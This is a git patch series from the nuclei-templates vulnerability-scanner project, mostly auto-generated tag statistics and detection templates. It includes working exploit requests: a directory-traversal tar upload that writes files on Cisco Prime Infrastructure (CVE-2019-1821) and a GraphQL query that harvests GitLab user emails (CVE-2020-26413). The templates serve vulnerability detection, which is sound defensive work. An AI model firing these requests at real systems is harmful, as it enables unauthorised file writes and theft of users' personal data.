triconsole | 1 | | | | | | | | | -| xampp | 1 | | | | | | | | | -| vsphere | 1 | | | | | | | | | -| ewebs | 1 | | | | | | | | | -| landray | 1 | | | | | | | | | -| speed | 1 | | | | | | | | | -| dropbox | 1 | | | | | | | | | -| extractor | 1 | | | | | | | | | -| natemail | 1 | | | | | | | | | -| sourcebans | 1 | | | | | | | | | -| labtech | 1 | | | | | | | | | | htmli | 1 | | | | | | | | | -| spf | 1 | | | | | | | | | -| gsoap | 1 | | | | | | | | | -| opencast | 1 | | | | | | | | | -| majordomo2 | 1 | | | | | | | | | -| scs | 1 | | | | | | | | | -| cloudinary | 1 | | | | | | | | | -| esmtp | 1 | | | | | | | | | -| rsyncd | 1 | | | | | | | | | -| seacms | 1 | | | | | | | | | -| playable | 1 | | | | | | | | | -| circle | 1 | | | | | | | | | -| acontent | 1 | | | | | | | | | -| metinfo | 1 | | | | | | | | | -| mapbox | 1 | | | | | | | | | -| calendly | 1 | | | | | | | | | -| luftguitar | 1 | | | | | | | | | -| jeewms | 1 | | | | | | | | | -| faraday | 1 | | | | | | | | | -| monitorix | 1 | | | | | | | | | -| dvr | 1 | | | | | | | | | -| ioncube | 1 | | | | | | | | | -| expn | 1 | | | | | | | | | -| appweb | 1 | | | | | | | | | -| uwsgi | 1 | | | | | | | | | -| jenkin | 1 | | | | | | | | | -| cockpit | 1 | | | | | | | | | -| mantis | 1 | | | | | | | | | -| rhymix | 1 | | | | | | | | | -| floc | 1 | | | | | | | | | -| oscommerce | 1 | | | | | | | | | -| saltapi | 1 | | | | | | | | | -| terraform | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | -| mariadb | 1 | | | | | | | | | -| linksys | 1 | | | | | | | | | -| pivotaltracker | 1 | | | | | | | | | -| maxsite | 1 | | | | | | | | | -| wix | 1 | | | | | | | | | -| hiboss | 1 | | | | | | | | | -| camunda | 1 | | | | | | | | | -| tika | 1 | | | | | | | | | -| trilithic | 1 | | | | | | | | | -| aniapi | 1 | | | | | | | | | -| concrete | 1 | | | | | | | | | -| csod | 1 | | | | | | | | | -| xiuno | 1 | | | | | | | | | -| nweb2fax | 1 | | | | | | | | | -| chinaunicom | 1 | | | | | | | | | -| place | 1 | | | | | | | | | -| drone | 1 | | | | | | | | | -| iceflow | 1 | | | | | | | | | -| cloudflare | 1 | | | | | | | | | -| tinypng | 1 | | | | | | | | | -| realteo | 1 | | | | | | | | | -| accela | 1 | | | | | | | | | -| key | 1 | | | | | | | | | -| pagerduty | 1 | | | | | | | | | -| ganglia | 1 | | | | | | | | | -| leanix | 1 | | | | | | | | | -| bing | 1 | | | | | | | | | -| locations | 1 | | | | | | | | | -| maccmsv10 | 1 | | | | | | | | | -| redcap | 1 | | | | | | | | | -| mongo | 1 | | | | | | | | | -| lg-nas | 1 | | | | | | | | | -| emc | 1 | | | | | | | | | -| digitalocean | 1 | | | | | | | | | -| ilo4 | 1 | | | | | | | | | -| lotuscms | 1 | | | | | | | | | -| starttls | 1 | | | | | | | | | -| nc2 | 1 | | | | | | | | | -| checkpoint | 1 | | | | | | | | | -| fortilogger | 1 | | | | | | | | | -| woocomernce | 1 | | | | | | | | | -| gridx | 1 | | | | | | | | | -| ognl | 1 | | | | | | | | | -| yzmcms | 1 | | | | | | | | | -| youtube | 1 | | | | | | | | | -| parentlink | 1 | | | | | | | | | -| tracer | 1 | | | | | | | | | -| influxdb | 1 | | | | | | | | | -| api-manager | 1 | | | | | | | | | -| jfrog | 1 | | | | | | | | | -| sterling | 1 | | | | | | | | | -| proftpd | 1 | | | | | | | | | -| websvn | 1 | | | | | | | | | -| alibaba | 1 | | | | | | | | | -| karel | 1 | | | | | | | | | -| lutron | 1 | | | | | | | | | -| dwsync | 1 | | | | | | | | | -| planon | 1 | | | | | | | | | -| st | 1 | | | | | | | | | -| phpunit | 1 | | | | | | | | | -| pmb | 1 | | | | | | | | | -| myanimelist | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| shoretel | 1 | | | | | | | | | -| cgi | 1 | | | | | | | | | -| paypal | 1 | | | | | | | | | -| crm | 1 | | | | | | | | | -| arl | 1 | | | | | | | | | -| cve202 | 1 | | | | | | | | | -| visualtools | 1 | | | | | | | | | -| nette | 1 | | | | | | | | | -| imap | 1 | | | | | | | | | -| mantisbt | 1 | | | | | | | | | -| intercom | 1 | | | | | | | | | -| wakatime | 1 | | | | | | | | | -| oidc | 1 | | | | | | | | | -| circontrol | 1 | | | | | | | | | -| sureline | 1 | | | | | | | | | -| blackboard | 1 | | | | | | | | | -| shiro | 1 | | | | | | | | | -| nsasg | 1 | | | | | | | | | -| turbocrm | 1 | | | | | | | | | -| dahua | 1 | | | | | | | | | -| cyberoam | 1 | | | | | | | | | -| qvisdvr | 1 | | | | | | | | | -| glances | 1 | | | | | | | | | -| hubspot | 1 | | | | | | | | | -| calendarix | 1 | | | | | | | | | -| hadoop | 1 | | | | | | | | | -| totaljs | 1 | | | | | | | | | -| twitter | 1 | | | | | | | | | -| syslog | 1 | | | | | | | | | -| empirecms | 1 | | | | | | | | | -| tpshop | 1 | | | | | | | | | -| tectuus | 1 | | | | | | | | | -| beanshell | 1 | | | | | | | | | -| exacqvision | 1 | | | | | | | | | -| gateone | 1 | | | | | | | | | -| webftp | 1 | | | | | | | | | -| spectracom | 1 | | | | | | | | | -| dotclear | 1 | | | | | | | | | -| pulsesecure | 1 | | | | | | | | | -| solman | 1 | | | | | | | | | -| instagram | 1 | | | | | | | | | -| kubeflow | 1 | | | | | | | | | -| gotmls | 1 | | | | | | | | | -| ipstack | 1 | | | | | | | | | -| owasp | 1 | | | | | | | | | -| traefik | 1 | | | | | | | | | -| portainer | 1 | | | | | | | | | -| clusterengine | 1 | | | | | | | | | -| qsan | 1 | | | | | | | | | -| motorola | 1 | | | | | | | | | -| nimble | 1 | | | | | | | | | -| csrfguard | 1 | | | | | | | | | -| rabbitmq | 1 | | | | | | | | | -| setup | 1 | | | | | | | | | -| wing-ftp | 1 | | | | | | | | | -| h3c-imc | 1 | | | | | | | | | -| fontawesome | 1 | | | | | | | | | -| codemeter | 1 | | | | | | | | | -| springframework | 1 | | | | | | | | | -| hortonworks | 1 | | | | | | | | | -| alertmanager | 1 | | | | | | | | | -| adb | 1 | | | | | | | | | -| mysql | 1 | | | | | | | | | -| bullwark | 1 | | | | | | | | | -| bazarr | 1 | | | | | | | | | -| elfinder | 1 | | | | | | | | | -| sco | 1 | | | | | | | | | -| sentry | 1 | | | | | | | | | -| wooyun | 1 | | | | | | | | | -| gloo | 1 | | | | | | | | | -| vnc | 1 | | | | | | | | | -| rubedo | 1 | | | | | | | | | -| beanstalk | 1 | | | | | | | | | -| yealink | 1 | | | | | | | | | -| k8s | 1 | | | | | | | | | -| plc | 1 | | | | | | | | | -| werkzeug | 1 | | | | | | | | | -| vidyo | 1 | | | | | | | | | -| default-login | 1 | | | | | | | | | -| fastapi | 1 | | | | | | | | | -| auth | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | | bolt | 1 | | | | | | | | | -| wavemaker | 1 | | | | | | | | | -| dotnet | 1 | | | | | | | | | -| netdata | 1 | | | | | | | | | -| okta | 1 | | | | | | | | | -| facebook | 1 | | | | | | | | | +| eg | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | | openrestry | 1 | | | | | | | | | +| hubspot | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| paypal | 1 | | | | | | | | | +| vercel | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| sterling | 1 | | | | | | | | | +| sast | 1 | | | | | | | | | +| apigee | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| pivotaltracker | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| billquick | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| netlify | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| seeddms | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| xmpp | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| netrc | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| nordex | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| visualstudio | 1 | | | | | | | | | +| fontawesome | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| planon | 1 | | | | | | | | | +| thedogapi | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| roads | 1 | | | | | | | | | +| loganalyzer | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| find | 1 | | | | | | | | | +| aniapi | 1 | | | | | | | | | +| geolocation | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| clave | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| square | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| bingmaps | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| clockwork | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| tugboat | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| myanimelist | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| pmb | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| intercom | 1 | | | | | | | | | +| panasonic | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| iucn | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| bash | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| facebook | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| europeana | 1 | | | | | | | | | +| buildkite | 1 | | | | | | | | | +| listserv | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index feaf8ddf53..dd5dbd59aa 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 852 | dhiyaneshdk | 309 | cves | 856 | info | 833 | http | 2326 | -| lfi | 350 | daffainfo | 304 | vulnerabilities | 333 | high | 659 | file | 57 | -| panel | 295 | pikpikcu | 281 | exposed-panels | 289 | medium | 493 | network | 46 | -| xss | 266 | pdteam | 208 | technologies | 210 | critical | 303 | dns | 12 | -| wordpress | 262 | geeknik | 172 | exposures | 199 | low | 158 | | | -| exposure | 250 | dwisiswant0 | 152 | misconfiguration | 148 | | | | | -| rce | 221 | gy741 | 85 | token-spray | 98 | | | | | -| tech | 204 | pussycat0x | 76 | takeovers | 66 | | | | | -| wp-plugin | 180 | princechaddha | 67 | default-logins | 61 | | | | | -| cve2021 | 166 | madrobot | 65 | file | 57 | | | | | +| cve | 859 | dhiyaneshdk | 315 | cves | 864 | info | 841 | http | 2345 | +| lfi | 353 | daffainfo | 308 | vulnerabilities | 334 | high | 663 | file | 57 | +| panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 498 | network | 46 | +| xss | 268 | pdteam | 209 | technologies | 211 | critical | 305 | dns | 12 | +| wordpress | 263 | geeknik | 172 | exposures | 199 | low | 158 | | | +| exposure | 252 | dwisiswant0 | 152 | misconfiguration | 151 | | | | | +| rce | 222 | gy741 | 85 | token-spray | 102 | | | | | +| tech | 205 | pussycat0x | 77 | takeovers | 66 | | | | | +| wp-plugin | 181 | princechaddha | 67 | default-logins | 61 | | | | | +| cve2021 | 168 | madrobot | 65 | file | 57 | | | | | From feb449e0280300959d0beeb3b9a205b1121e74e7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 6 Nov 2021 11:30:55 +0000 Subject: [PATCH 3462/4083] Auto README Update [Sat Nov 6 11:30:55 UTC 2021] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/README.md b/README.md index 93de150135..3baca92138 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 852 | dhiyaneshdk | 309 | cves | 856 | info | 833 | http | 2326 | -| lfi | 350 | daffainfo | 304 | vulnerabilities | 333 | high | 659 | file | 57 | -| panel | 295 | pikpikcu | 281 | exposed-panels | 289 | medium | 493 | network | 46 | -| xss | 266 | pdteam | 208 | technologies | 210 | critical | 303 | dns | 12 | -| wordpress | 262 | geeknik | 172 | exposures | 199 | low | 158 | | | -| exposure | 250 | dwisiswant0 | 152 | misconfiguration | 148 | | | | | -| rce | 221 | gy741 | 85 | token-spray | 98 | | | | | -| tech | 204 | pussycat0x | 76 | takeovers | 66 | | | | | -| wp-plugin | 180 | princechaddha | 67 | default-logins | 61 | | | | | -| cve2021 | 166 | madrobot | 65 | file | 57 | | | | | +| cve | 859 | dhiyaneshdk | 315 | cves | 864 | info | 841 | http | 2345 | +| lfi | 353 | daffainfo | 308 | vulnerabilities | 334 | high | 663 | file | 57 | +| panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 498 | network | 46 | +| xss | 268 | pdteam | 209 | technologies | 211 | critical | 305 | dns | 12 | +| wordpress | 263 | geeknik | 172 | exposures | 199 | low | 158 | | | +| exposure | 252 | dwisiswant0 | 152 | misconfiguration | 151 | | | | | +| rce | 222 | gy741 | 85 | token-spray | 102 | | | | | +| tech | 205 | pussycat0x | 77 | takeovers | 66 | | | | | +| wp-plugin | 181 | princechaddha | 67 | default-logins | 61 | | | | | +| cve2021 | 168 | madrobot | 65 | file | 57 | | | | | -**181 directories, 2509 files**. +**182 directories, 2529 files**. From ca57c815da64184450b10c3aa391e4450b0ccb78 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 6 Nov 2021 12:47:58 +0000 Subject: [PATCH 3463/4083] Auto Generated CVE annotations [Sat Nov 6 12:47:58 UTC 2021] :robot: --- cves/2016/CVE-2016-3088.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2016/CVE-2016-3088.yaml b/cves/2016/CVE-2016-3088.yaml index f8446e5651..4cd01d76f9 100644 --- a/cves/2016/CVE-2016-3088.yaml +++ b/cves/2016/CVE-2016-3088.yaml @@ -3,13 +3,18 @@ id: CVE-2016-3088 info: name: ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088) author: fq_hsu - severity: high + severity: critical description: The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request. reference: - https://www.exploit-db.com/exploits/40857 - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt - https://nvd.nist.gov/vuln/detail/CVE-2016-3088 tags: fileupload,cve,cve2016,apache,activemq + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2016-3088 + cwe-id: CWE-20 requests: - raw: From 5aeb4de8c8acf80139d1d4948105c42ed8b7bd1c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 6 Nov 2021 18:22:50 +0530 Subject: [PATCH 3464/4083] Create CVE-2020-26413.yaml --- cves/2020/CVE-2020-26413.yaml | 40 +++++++++++++++++++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 cves/2020/CVE-2020-26413.yaml diff --git a/cves/2020/CVE-2020-26413.yaml b/cves/2020/CVE-2020-26413.yaml new file mode 100644 index 0000000000..b3a0279b73 --- /dev/null +++ b/cves/2020/CVE-2020-26413.yaml @@ -0,0 +1,40 @@ +id: CVE-2020-26413 + +info: + name: GitLab information leak (CVE-2020-26413) + author: _0xf4n9x_ + severity: medium + description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.4 before 13.6.2. Information disclosure via GraphQL results in user email being unexpectedly visible. + reference: + - https://gitlab.com/gitlab-org/gitlab/-/issues/244275 + - https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json + - https://nvd.nist.gov/vuln/detail/CVE-2020-26413 + tags: exposure,cve,cve2020,gitlab + +requests: + - raw: + - | + POST /api/graphql HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + Content-Length: 265 + + { + "query": "{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }", + "variables": null, + "operationName": null + } + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "username" + - "email" + - "avatarUrl" + condition: and + + - type: status + status: + - 200 From 32e666d1f0f5848d1ef8bbaa73d3a832ad6a71b3 Mon Sep 17 00:00:00 2001 From: Pradeepch99 Date: Sat, 6 Nov 2021 18:24:24 +0530 Subject: [PATCH 3465/4083] Update gocd-encryption-key.yaml --- misconfiguration/gocd/gocd-encryption-key.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/misconfiguration/gocd/gocd-encryption-key.yaml b/misconfiguration/gocd/gocd-encryption-key.yaml index 6f1d3eb837..f126bde4de 100644 --- a/misconfiguration/gocd/gocd-encryption-key.yaml +++ b/misconfiguration/gocd/gocd-encryption-key.yaml @@ -23,6 +23,11 @@ requests: - type: status status: - 200 + + - type: word + words: + - 'text/plain' + part: header - type: regex regex: From 199d7061f70bbb3f9dcb2baeacdce96dd687d65f Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Sat, 6 Nov 2021 18:45:55 +0530 Subject: [PATCH 3466/4083] Update gocd-encryption-key.yaml --- misconfiguration/gocd/gocd-encryption-key.yaml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/misconfiguration/gocd/gocd-encryption-key.yaml b/misconfiguration/gocd/gocd-encryption-key.yaml index f126bde4de..80d0ed8b6b 100644 --- a/misconfiguration/gocd/gocd-encryption-key.yaml +++ b/misconfiguration/gocd/gocd-encryption-key.yaml @@ -23,17 +23,17 @@ requests: - type: status status: - 200 - - - type: word - words: - - 'text/plain' - part: header - type: regex regex: - - "([a-z0-9]+)" + - "([a-z0-9]){32}" + + - type: word + part: header + words: + - "text/plain" extractors: - type: regex regex: - - "([a-z0-9]+)" + - "([a-z0-9]){32}" From c16a2a196173ee5308a4620cf905eb73e11bdadb Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 6 Nov 2021 19:07:53 +0530 Subject: [PATCH 3467/4083] Adding missing path --- token-spray/api-nownodes.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/token-spray/api-nownodes.yaml b/token-spray/api-nownodes.yaml index fd2cc1ee93..073ed83e17 100644 --- a/token-spray/api-nownodes.yaml +++ b/token-spray/api-nownodes.yaml @@ -13,7 +13,7 @@ self-contained: true requests: - raw: - | - GET /api HTTP/1.1 + GET https://bsc-blockbook.nownodes.io/api HTTP/1.1 Host: bsc-blockbook.nownodes.io api-key: {{token}} Content-Type: application/json From b1d7f6087c91d3e05ca00c0a4266f64d3976bfed Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 6 Nov 2021 20:08:10 +0530 Subject: [PATCH 3468/4083] Update CVE-2016-3088.yaml --- cves/2016/CVE-2016-3088.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2016/CVE-2016-3088.yaml b/cves/2016/CVE-2016-3088.yaml index 4cd01d76f9..1a43f975db 100644 --- a/cves/2016/CVE-2016-3088.yaml +++ b/cves/2016/CVE-2016-3088.yaml @@ -7,6 +7,7 @@ info: description: The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request. reference: - https://www.exploit-db.com/exploits/40857 + - https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30 - http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt - https://nvd.nist.gov/vuln/detail/CVE-2016-3088 tags: fileupload,cve,cve2016,apache,activemq From 0e27f2413838a216d730ee6f2fe5aadfbe4e5456 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 6 Nov 2021 20:18:27 +0530 Subject: [PATCH 3469/4083] Update CVE-2020-26413.yaml --- cves/2020/CVE-2020-26413.yaml | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/cves/2020/CVE-2020-26413.yaml b/cves/2020/CVE-2020-26413.yaml index b3a0279b73..883cd026c1 100644 --- a/cves/2020/CVE-2020-26413.yaml +++ b/cves/2020/CVE-2020-26413.yaml @@ -1,15 +1,15 @@ id: CVE-2020-26413 info: - name: GitLab information leak (CVE-2020-26413) - author: _0xf4n9x_ + name: Gitlab User enumeration via Graphql API CVE-2020-26413 + author: _0xf4n9x_,pikpikcu severity: medium description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.4 before 13.6.2. Information disclosure via GraphQL results in user email being unexpectedly visible. reference: - https://gitlab.com/gitlab-org/gitlab/-/issues/244275 - https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json - https://nvd.nist.gov/vuln/detail/CVE-2020-26413 - tags: exposure,cve,cve2020,gitlab + tags: exposure,cve,cve2020,gitlab,enumeration requests: - raw: @@ -31,10 +31,20 @@ requests: part: body words: - "username" - - "email" - "avatarUrl" condition: and - type: status status: - 200 + + - type: regex + part: body + regex: + - 'email":"([a-z@.]+)"' + + extractors: + - type: regex + part: body + regex: + - '"email":"([a-z@.]+)"' From 57b4425e52b17272b2b6ecf763d0897aa302092f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 6 Nov 2021 20:34:10 +0530 Subject: [PATCH 3470/4083] Create CVE-2019-1821.yaml --- cves/2019/CVE-2019-1821.yaml | 50 ++++++++++++++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 cves/2019/CVE-2019-1821.yaml diff --git a/cves/2019/CVE-2019-1821.yaml b/cves/2019/CVE-2019-1821.yaml new file mode 100644 index 0000000000..0601746190 --- /dev/null +++ b/cves/2019/CVE-2019-1821.yaml @@ -0,0 +1,50 @@ +id: CVE-2019-1821 + +info: + name: Cisco prime infrastructure unauthorized RCE (CVE-2019-1821) + author: _0xf4n9x_ + severity: high + description: Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability. + reference: + - https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-1821 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1821 + tags: rce,fileupload,unauth,cve,cve2019 + +requests: + - raw: + - | + POST /servlet/UploadServlet HTTP/1.1 + Host: {{Hostname}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + Primary-IP: 127.0.0.1 + Filename: test.tar + Filesize: 10240 + Compressed-Archive: false + Destination-Dir: tftpRoot + Filecount: 1 + Content-Length: 269 + Content-Type: multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83 + + --871a4a346a547cf05cb83f57b9ebcb83 + Content-Disposition: form-data; name="files"; filename="test.tar" + + ../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000{{randstr}} + --871a4a346a547cf05cb83f57b9ebcb83-- + + - | + GET /test.txt HTTP/1.1 + Host: {{Host}} + Connection: close + Accept-Encoding: gzip, deflate + Accept: */* + + req-condition: true + matchers: + - type: dsl + dsl: + - "status_code==200" + - "contains((body_2), '{{randstr}}')" + condition: and From 92a5e7f8c2ceaeae54640542ed6eeb674638402a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 6 Nov 2021 22:18:39 +0530 Subject: [PATCH 3471/4083] Create cisco-prime-infrastructure.yaml --- .../cisco/cisco-prime-infrastructure.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 exposed-panels/cisco/cisco-prime-infrastructure.yaml diff --git a/exposed-panels/cisco/cisco-prime-infrastructure.yaml b/exposed-panels/cisco/cisco-prime-infrastructure.yaml new file mode 100644 index 0000000000..3338eacc3c --- /dev/null +++ b/exposed-panels/cisco/cisco-prime-infrastructure.yaml @@ -0,0 +1,26 @@ +id: cisco-prime-infrastructure + +info: + name: Cisco Prime Infrastructure + author: dhiyaneshDk + severity: info + tags: panel,cisco + metadata: + shodan-query: 'http.title:"prime infrastructure"' + +requests: + - method: GET + path: + - "{{BaseURL}}/webacs/pages/common/login.jsp" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Prime Infrastructure" + - "Cisco " + + - type: status + status: + - 200 From 08abcb2225a010cc66f2acb120008ff66ea6d517 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 6 Nov 2021 22:36:13 +0530 Subject: [PATCH 3472/4083] Create meshcentral-login.yaml --- exposed-panels/meshcentral-login.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/meshcentral-login.yaml diff --git a/exposed-panels/meshcentral-login.yaml b/exposed-panels/meshcentral-login.yaml new file mode 100644 index 0000000000..b6084c21de --- /dev/null +++ b/exposed-panels/meshcentral-login.yaml @@ -0,0 +1,25 @@ +id: meshcentral-login + +info: + name: MeshCentral - Login + author: dhiyaneshDk + severity: info + tags: panel + metadata: + shodan-query: 'http.title:"MeshCentral - Login"' + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "MeshCentral - Login" + + - type: status + status: + - 200 From dbbb08e40cb13211e71d046ecfb9a9eba7d92287 Mon Sep 17 00:00:00 2001 From: sandeep Date: Sat, 6 Nov 2021 22:36:37 +0530 Subject: [PATCH 3473/4083] misc updates --- cves/2020/CVE-2020-26413.yaml | 29 ++++++--------- .../gitlab/gitlab-graphql-user-enum.yaml | 37 ------------------- 2 files changed, 12 insertions(+), 54 deletions(-) delete mode 100644 misconfiguration/gitlab/gitlab-graphql-user-enum.yaml diff --git a/cves/2020/CVE-2020-26413.yaml b/cves/2020/CVE-2020-26413.yaml index 883cd026c1..89780ec335 100644 --- a/cves/2020/CVE-2020-26413.yaml +++ b/cves/2020/CVE-2020-26413.yaml @@ -1,7 +1,7 @@ id: CVE-2020-26413 info: - name: Gitlab User enumeration via Graphql API CVE-2020-26413 + name: Gitlab User enumeration via Graphql API author: _0xf4n9x_,pikpikcu severity: medium description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 13.4 before 13.6.2. Information disclosure via GraphQL results in user email being unexpectedly visible. @@ -9,7 +9,7 @@ info: - https://gitlab.com/gitlab-org/gitlab/-/issues/244275 - https://gitlab.com/gitlab-org/cves/-/blob/master/2020/CVE-2020-26413.json - https://nvd.nist.gov/vuln/detail/CVE-2020-26413 - tags: exposure,cve,cve2020,gitlab,enumeration + tags: cve,cve2020,gitlab,exposure,enum requests: - raw: @@ -17,34 +17,29 @@ requests: POST /api/graphql HTTP/1.1 Host: {{Hostname}} Content-Type: application/json - Content-Length: 265 { - "query": "{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }", - "variables": null, - "operationName": null - } + "query": "{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }", + "variables": null, + "operationName": null + } matchers-condition: and matchers: - type: word part: body words: - - "username" - - "avatarUrl" + - '"username":' + - '"avatarUrl":' + - '"node":' condition: and - type: status status: - 200 - - type: regex - part: body - regex: - - 'email":"([a-z@.]+)"' - extractors: - - type: regex + - type: json part: body - regex: - - '"email":"([a-z@.]+)"' + json: + - '.data.users.edges[].node.email' diff --git a/misconfiguration/gitlab/gitlab-graphql-user-enum.yaml 